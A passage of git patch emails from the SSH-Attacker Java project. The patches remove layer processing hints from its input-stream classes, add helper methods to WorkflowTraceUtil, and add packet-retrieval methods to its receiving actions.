ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -908,7 +885,7 @@ private void readGexDHExchangeRequest(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -918,7 +895,7 @@ private void readUserAuthFail(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -928,7 +905,7 @@ private void readGexDHExchangeInitMessage(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -938,7 +915,7 @@ private void readDhKeyInitMessage(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -948,7 +925,7 @@ private void readDhKeyReplyMessage(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -958,7 +935,7 @@ private void readGexDHExchangeReplyMessage(AbstractPacket packet) temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -968,7 +945,7 @@ private void readKeyExchangeRSAPubkeyMessage(AbstractPacket packet temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -978,7 +955,7 @@ private void readKeyExchangeRSASecret(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -988,7 +965,7 @@ private void readKeyExchangeRSADone(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -998,7 +975,7 @@ private void readUserAuthBanner(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -1008,7 +985,7 @@ private void readUserAuthInfoReq(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -1018,7 +995,7 @@ private void readUserAuthInfoResp(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -1028,7 +1005,7 @@ private void readRequestSuccess(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -1038,7 +1015,7 @@ private void readRequestFailure(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -1048,7 +1025,7 @@ private void readChannelWindowsAdjust(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -1058,7 +1035,7 @@ private void readChannelDataMessage(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -1068,7 +1045,7 @@ private void readServiceRequestData(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -1078,7 +1055,7 @@ private void readChannelOpen(AbstractPacket packet) { HintedInputStream temp_stream; inputStream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); /* try { inputStream = getLowerLayer().getDataStream(); } catch (IOException e) { @@ -1095,7 +1072,6 @@ private void readChannelOpen(AbstractPacket packet) { new ChannelOpenSessionMessage(); temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream( channelOpenUnknownMessage .getCompleteResultingMessage() @@ -1113,7 +1089,7 @@ private void readMsgServiceAccept(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -1123,7 +1099,7 @@ private void readHbrReplProtocolData(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -1133,7 +1109,7 @@ private void readNewKeysProtocolData(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -1143,7 +1119,7 @@ private void readKexInitProtocolData(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -1153,7 +1129,7 @@ private void readHbrInitProtocolData(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -1164,7 +1140,7 @@ private void readVersionExchangeProtocolData(AbstractPacket packet) temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -1181,11 +1157,11 @@ private void readUnknownProtocolData() { } @Override - public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException { + public void receiveMoreData() throws IOException { try { HintedInputStream dataStream = null; dataStream = getLowerLayer().getDataStream(); - currentInputStream = new HintedLayerInputStream(null, this); + currentInputStream = new HintedLayerInputStream(this); currentInputStream.extendStream(dataStream.readAllBytes()); } catch (TimeoutException ex) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java index 8bbb59c6e..fb7e4b6c0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java @@ -15,7 +15,6 @@ import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; import de.rub.nds.sshattacker.core.layer.context.TcpContext; import de.rub.nds.sshattacker.core.layer.data.DataContainer; -import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; import de.rub.nds.sshattacker.core.layer.stream.HintedInputStreamAdapterStream; import de.rub.nds.tlsattacker.transport.tcp.TcpTransportHandler; @@ -28,7 +27,7 @@ * The TCP layer is a wrapper around an underlying TCP socket. It forwards the sockets InputStream * for reading and sends any data over the TCP socket without modifications. */ -public class TcpLayer extends ProtocolLayer { +public class TcpLayer extends ProtocolLayer { private static Logger LOGGER = LogManager.getLogger(); @@ -59,7 +58,7 @@ public LayerProcessingResult sendData(byte[] data) throws IOException { } @Override - public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException { + public void receiveMoreData() throws IOException { // There is nothing we can do here to fill up our stream, either there is data in it // or not } @@ -78,15 +77,13 @@ public HintedInputStream getDataStream() throws IOException { } while (readByte.length > 0 && readByte[0] != CharConstants.NEWLINE); currentInputStream = - new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(receiveBuffer)); + new HintedInputStreamAdapterStream(new ByteArrayInputStream(receiveBuffer)); return currentInputStream; } else { currentInputStream = - new HintedInputStreamAdapterStream( - null, getTransportHandler().getInputStream()); + new HintedInputStreamAdapterStream(getTransportHandler().getInputStream()); return currentInputStream; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStream.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStream.java index dacd3a700..57641a187 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStream.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStream.java @@ -10,7 +10,6 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; import de.rub.nds.sshattacker.core.exceptions.ParserException; -import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; import java.io.IOException; import java.io.InputStream; @@ -20,15 +19,7 @@ */ public abstract class HintedInputStream extends InputStream { - private LayerProcessingHint hint; - - public HintedInputStream(LayerProcessingHint hint) { - this.hint = hint; - } - - public LayerProcessingHint getHint() { - return hint; - } + public HintedInputStream() {} public byte readByte() throws IOException { return (byte) read(); @@ -62,8 +53,4 @@ public byte[] readChunk(int size) throws IOException { protected abstract InputStream getDataSource(); public abstract void extendStream(byte[] bytes); - - public void setHint(LayerProcessingHint hint) { - this.hint = hint; - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStreamAdapterStream.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStreamAdapterStream.java index e09d4c699..be06f0637 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStreamAdapterStream.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStreamAdapterStream.java @@ -7,7 +7,6 @@ */ package de.rub.nds.sshattacker.core.layer.stream; -import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; import java.io.IOException; import java.io.InputStream; @@ -19,8 +18,8 @@ public class HintedInputStreamAdapterStream extends HintedInputStream { private InputStream stream; - public HintedInputStreamAdapterStream(LayerProcessingHint hint, InputStream stream) { - super(hint); + public HintedInputStreamAdapterStream(InputStream stream) { + super(); this.stream = stream; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedLayerInputStream.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedLayerInputStream.java index a4dfeaec5..f6bd5cd39 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedLayerInputStream.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedLayerInputStream.java @@ -8,7 +8,6 @@ package de.rub.nds.sshattacker.core.layer.stream; import de.rub.nds.sshattacker.core.layer.ProtocolLayer; -import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; import java.io.IOException; @@ -20,12 +19,12 @@ */ public class HintedLayerInputStream extends HintedInputStream { - private final ProtocolLayer layer; + private final ProtocolLayer layer; private ByteArrayInputStream stream = new ByteArrayInputStream(new byte[0]); - public HintedLayerInputStream(LayerProcessingHint hint, ProtocolLayer layer) { - super(hint); + public HintedLayerInputStream(ProtocolLayer layer) { + super(); this.layer = layer; } @@ -38,7 +37,7 @@ public int read() throws IOException { if (stream.available() > 0) { return stream.read(); } else { - layer.receiveMoreDataForHint(getHint()); + layer.receiveMoreData(); // either the stream is now filled, or we ran into a timeout // or the next stream is available return stream.read(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceUtil.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceUtil.java index 2ef9a9b41..232e976c4 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceUtil.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceUtil.java @@ -7,26 +7,66 @@ */ package de.rub.nds.sshattacker.core.workflow; -import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; -import de.rub.nds.sshattacker.core.protocol.common.SshMessage; import de.rub.nds.sshattacker.core.workflow.action.ReceivingAction; import de.rub.nds.sshattacker.core.workflow.action.SendingAction; +import de.rub.nds.sshattacker.core.workflow.action.SshAction; import java.util.LinkedList; import java.util.List; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; public final class WorkflowTraceUtil { - public static List> getAllSendMessages(WorkflowTrace trace) { - List> sendMessages = new LinkedList<>(); - for (SendingAction action : trace.getSendingActions()) { - sendMessages.addAll(action.getSendMessages()); + private static final Logger LOGGER = LogManager.getLogger(); + + public static ProtocolMessage getFirstReceivedMessage(WorkflowTrace trace) { + List messageList = getAllReceivedMessages(trace); + if (messageList.isEmpty()) { + return null; + } else { + return messageList.get(0); } - return sendMessages; } - public static List> getAllReceivedMessages(WorkflowTrace trace) { - List> receivedMessage = new LinkedList<>(); + public static ProtocolMessage getLastReceivedMessage(WorkflowTrace trace) { + List messageList = getAllReceivedMessages(trace); + if (messageList.isEmpty()) { + return null; + } else { + return messageList.get(messageList.size() - 1); + } + } + + public static ProtocolMessage getFirstSendMessage(WorkflowTrace trace) { + List messageList = getAllSendMessages(trace); + if (messageList.isEmpty()) { + return null; + } else { + return messageList.get(0); + } + } + + public static SshAction getFirstFailedAction(WorkflowTrace trace) { + for (SshAction action : trace.getSshActions()) { + if (!action.executedAsPlanned()) { + return action; + } + } + return null; + } + + public static ProtocolMessage getLastSendMessage(WorkflowTrace trace) { + List messageList = getAllSendMessages(trace); + if (messageList.isEmpty()) { + return null; + } else { + return messageList.get(messageList.size() - 1); + } + } + + public static List getAllReceivedMessages(WorkflowTrace trace) { + List receivedMessage = new LinkedList<>(); for (ReceivingAction action : trace.getReceivingActions()) { if (action.getReceivedMessages() != null) { receivedMessage.addAll(action.getReceivedMessages()); @@ -35,19 +75,96 @@ public static List> getAllReceivedMessages(WorkflowTrace trac return receivedMessage; } - public static List> getAllReceivedMessages( - WorkflowTrace trace, MessageIdConstant type) { - List> receivedMessage = new LinkedList<>(); - for (ProtocolMessage message : getAllReceivedMessages(trace)) { - if (message instanceof SshMessage - && ((SshMessage) message).getMessageId().getValue() == type.getId()) { - receivedMessage.add(message); + public static List getAllSendMessages(WorkflowTrace trace) { + List sendMessages = new LinkedList<>(); + for (SendingAction action : trace.getSendingActions()) { + sendMessages.addAll(action.getSendMessages()); + } + return sendMessages; + } + + public static SendingAction getLastSendingAction(WorkflowTrace trace) { + List sendingActions = trace.getSendingActions(); + return sendingActions.get(sendingActions.size() - 1); + } + + public static SshAction getLaterAction( + WorkflowTrace trace, SshAction action1, SshAction action2) { + if ((action1 == null && action2 == null) + || (!containsIdenticalAction(trace, action1) + && !containsIdenticalAction(trace, action2))) { + return null; + } else if (action1 == null || !containsIdenticalAction(trace, action1)) { + return action2; + } else if (action2 == null || !containsIdenticalAction(trace, action2)) { + return action1; + } + + return indexOfIdenticalAction(trace, action1) > indexOfIdenticalAction(trace, action2) + ? action1 + : action2; + } + + public static SshAction getEarlierAction( + WorkflowTrace trace, SshAction action1, SshAction action2) { + if ((action1 == null && action2 == null) + || (!containsIdenticalAction(trace, action1) + && !containsIdenticalAction(trace, action2))) { + return null; + } else if (action1 == null || !containsIdenticalAction(trace, action1)) { + return action2; + } else if (action2 == null || !containsIdenticalAction(trace, action2)) { + return action1; + } + + return indexOfIdenticalAction(trace, action1) < indexOfIdenticalAction(trace, action2) + ? action1 + : action2; + } + + /** + * Returns all Messages of the WorkflowTrace that contain unread bytes. They can be accessed + * over the {@link de.rub.nds.tlsattacker.core.layer.LayerProcessingResult} + */ + /* + public static List getMessageActionsWithUnreadBytes( + @Nonnull WorkflowTrace trace) { + List messageActionsWithUnreadBytes = new LinkedList<>(); + for (SshAction action : trace.getSshActions()) { + if (action instanceof MessageAction + && action instanceof ReceivingAction + && ((MessageAction) action).getLayerStackProcessingResult() != null + && ((MessageAction) action).getLayerStackProcessingResult().hasUnreadBytes()) { + messageActionsWithUnreadBytes.add((MessageAction) action); + } } + return messageActionsWithUnreadBytes; } - return receivedMessage; + */ + /* + + public static boolean hasUnreadBytes(@Nonnull WorkflowTrace trace) { + return !(getMessageActionsWithUnreadBytes(trace).isEmpty()); + } + */ + + public static int indexOfIdenticalAction(WorkflowTrace trace, SshAction action) { + if (trace.getSshActions() != null) { + for (int i = 0; i < trace.getSshActions().size(); i++) { + if (trace.getSshActions().get(i) == action) { + return i; + } + } + } + return -1; } - private WorkflowTraceUtil() { - super(); + public static boolean containsIdenticalAction(WorkflowTrace trace, SshAction action) { + if (trace.getSshActions() != null) { + return trace.getSshActions().stream().anyMatch(listed -> listed == action); + } + return false; } + + private WorkflowTraceUtil() {} } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java index e0b745d14..8c0843752 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java @@ -152,7 +152,10 @@ public abstract class MessageAction extends ConnectionBoundAction { name = "HybridKeyExchangeReply"), @XmlElement(type = IgnoreMessage.class, name = "IgnoreMessage"), @XmlElement(type = KeyExchangeInitMessage.class, name = "KeyExchangeInit"), + @XmlElement(type = NewCompressMessage.class, name = "NewCompress"), @XmlElement(type = NewKeysMessage.class, name = "NewKeys"), + @XmlElement(type = PingMessage.class, name = "Ping"), + @XmlElement(type = PongMessage.class, name = "Pong"), @XmlElement(type = RsaKeyExchangeDoneMessage.class, name = "RsaKeyExchangeDone"), @XmlElement( type = RsaKeyExchangePubkeyMessage.class, diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java index 735289ec3..6d8c2aec7 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java @@ -143,7 +143,10 @@ public class ReceiveAction extends MessageAction implements ReceivingAction { name = "EcdhKeyExchangeReply"), @XmlElement(type = IgnoreMessage.class, name = "IgnoreMessage"), @XmlElement(type = KeyExchangeInitMessage.class, name = "KeyExchangeInit"), + @XmlElement(type = NewCompressMessage.class, name = "NewCompress"), @XmlElement(type = NewKeysMessage.class, name = "NewKeys"), + @XmlElement(type = PingMessage.class, name = "Ping"), + @XmlElement(type = PongMessage.class, name = "Pong"), @XmlElement(type = RsaKeyExchangeDoneMessage.class, name = "RsaKeyExchangeDone"), @XmlElement( type = RsaKeyExchangePubkeyMessage.class, From 47185f849e8023242dd006c0fb12e87a87bdd000 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 18 Feb 2024 19:19:47 +0100 Subject: [PATCH 138/176] add filter again --- .../core/workflow/WorkflowTraceUtil.java | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceUtil.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceUtil.java index 232e976c4..c2a26ab65 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceUtil.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceUtil.java @@ -7,6 +7,7 @@ */ package de.rub.nds.sshattacker.core.workflow; +import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.workflow.action.ReceivingAction; import de.rub.nds.sshattacker.core.workflow.action.SendingAction; @@ -75,6 +76,17 @@ public static List getAllReceivedMessages(WorkflowTrace trace) return receivedMessage; } + public static List getAllReceivedMessages( + WorkflowTrace trace, MessageIdConstant type) { + List receivedMessage = new LinkedList<>(); + for (ProtocolMessage message : getAllReceivedMessages(trace)) { + if (message.getMessageIdConstant() == type) { + receivedMessage.add(message); + } + } + return receivedMessage; + } + public static List getAllSendMessages(WorkflowTrace trace) { List sendMessages = new LinkedList<>(); for (SendingAction action : trace.getSendingActions()) { @@ -122,10 +134,6 @@ public static SshAction getEarlierAction( : action2; } - /** - * Returns all Messages of the WorkflowTrace that contain unread bytes. They can be accessed - * over the {@link de.rub.nds.tlsattacker.core.layer.LayerProcessingResult} - */ /* public static List getMessageActionsWithUnreadBytes( @Nonnull WorkflowTrace trace) { From 7cec66eccc4ee6c8110c9bc4e395a0d2ec65a801 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 18 Feb 2024 19:48:25 +0100 Subject: [PATCH 139/176] Adding "getRecievedPackets" --- .../core/workflow/WorkflowTraceUtil.java | 16 ++++++++++++++++ .../action/DynamicKeyExchangeAction.java | 8 ++++++++ .../workflow/action/ForwardMessagesAction.java | 5 +++++ .../workflow/action/GenericReceiveAction.java | 14 +++++++++++++- .../core/workflow/action/ReceiveAction.java | 6 ++++++ .../core/workflow/action/ReceivingAction.java | 3 +++ 6 files changed, 51 insertions(+), 1 deletion(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceUtil.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceUtil.java index c2a26ab65..7416cea74 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceUtil.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceUtil.java @@ -8,12 +8,14 @@ package de.rub.nds.sshattacker.core.workflow; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; +import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.workflow.action.ReceivingAction; import de.rub.nds.sshattacker.core.workflow.action.SendingAction; import de.rub.nds.sshattacker.core.workflow.action.SshAction; import java.util.LinkedList; import java.util.List; +import java.util.stream.Collectors; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -21,6 +23,20 @@ public final class WorkflowTraceUtil { private static final Logger LOGGER = LogManager.getLogger(); + public static List getAllReceivedPackets(WorkflowTrace trace) { + return getAllReceivedPackets(trace, AbstractPacket.class); + } + + public static List getAllReceivedPackets( + WorkflowTrace trace, Class packetClass) { + //noinspection unchecked + return trace.getReceivingActions().stream() + .flatMap(action -> action.getReceivedPackets().stream()) + .filter(packetClass::isInstance) + .map(packet -> (T) packet) + .collect(Collectors.toUnmodifiableList()); + } + public static ProtocolMessage getFirstReceivedMessage(WorkflowTrace trace) { List messageList = getAllReceivedMessages(trace); if (messageList.isEmpty()) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicKeyExchangeAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicKeyExchangeAction.java index 14ee9d21b..0d9ab8d0b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicKeyExchangeAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicKeyExchangeAction.java @@ -11,6 +11,7 @@ import de.rub.nds.sshattacker.core.constants.KeyExchangeAlgorithm; import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.state.State; import de.rub.nds.sshattacker.core.workflow.factory.WorkflowConfigurationFactory; @@ -28,6 +29,8 @@ public class DynamicKeyExchangeAction extends MessageAction private static final Logger LOGGER = LogManager.getLogger(); private List sshActions = new ArrayList<>(); + protected List receivedPackets = new ArrayList<>(); + public DynamicKeyExchangeAction() { super(AliasedConnection.DEFAULT_CONNECTION_ALIAS); } @@ -58,6 +61,11 @@ public List> getReceivedMessages() { .collect(Collectors.toList()); } + @Override + public List getReceivedPackets() { + return null; + } + @Override public List> getSendMessages() { return sshActions.stream() diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java index 4ce9833d0..73a229c45 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java @@ -281,6 +281,11 @@ public List> getReceivedMessages() { return receivedMessages; } + @Override + public List getReceivedPackets() { + return null; + } + @Override public List> getSendMessages() { return sendMessages; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/GenericReceiveAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/GenericReceiveAction.java index 28a41d1c8..78acbf07e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/GenericReceiveAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/GenericReceiveAction.java @@ -9,9 +9,11 @@ import de.rub.nds.sshattacker.core.exceptions.ActionExecutionException; import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.state.State; import jakarta.xml.bind.annotation.XmlRootElement; +import java.util.ArrayList; import java.util.LinkedList; import java.util.List; import org.apache.logging.log4j.LogManager; @@ -30,6 +32,8 @@ public GenericReceiveAction(String connectionAlias) { super(connectionAlias); } + protected List receivedPackets = new ArrayList<>(); + @Override public void execute(State state) { if (isExecuted()) { @@ -37,7 +41,10 @@ public void execute(State state) { } LOGGER.debug("Receiving Messages..."); SshContext ctx = state.getContext(getConnectionAlias()).getSshContext(); - receive(ctx, null, null); + // receive(ctx, null, null); + receive(ctx, messages, packets); + + receivedPackets = packets; setExecuted(true); String received = getReadableString(messages); @@ -70,4 +77,9 @@ public void reset() { public List> getReceivedMessages() { return messages; } + + @Override + public List getReceivedPackets() { + return receivedPackets; + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java index 6d8c2aec7..f8dcb4385 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java @@ -181,6 +181,10 @@ public class ReceiveAction extends MessageAction implements ReceivingAction { /** Set to {@code true} if the {@link ReceiveOption#CHECK_ONLY_EXPECTED} option has been set. */ @XmlElement protected Boolean checkOnlyExpected = null; + public List getReceivedPackets() { + return receivedPackets; + } + /** * Set to {@code true} if the {@link * ReceiveOption#IGNORE_UNEXPECTED_GLOBAL_REQUESTS_WITHOUT_WANTREPLY} option has been set. @@ -257,6 +261,8 @@ public void execute(State state) throws WorkflowExecutionException { receive(context, expectedMessages, packets); + receivedPackets = packets; + /*LOGGER.debug("Receiving messages for connection alias '{}'...", getConnectionAlias()); MessageActionResult result = receiveMessageHelper.receiveMessages(context, expectedMessages); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceivingAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceivingAction.java index 70f78f1f8..6297fe71e 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceivingAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceivingAction.java @@ -7,10 +7,13 @@ */ package de.rub.nds.sshattacker.core.workflow.action; +import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import java.util.List; public interface ReceivingAction { List> getReceivedMessages(); + + List getReceivedPackets(); } From adf5c8a66bcaa368e30f7e3d9764c99db58f4dfb Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 24 Feb 2024 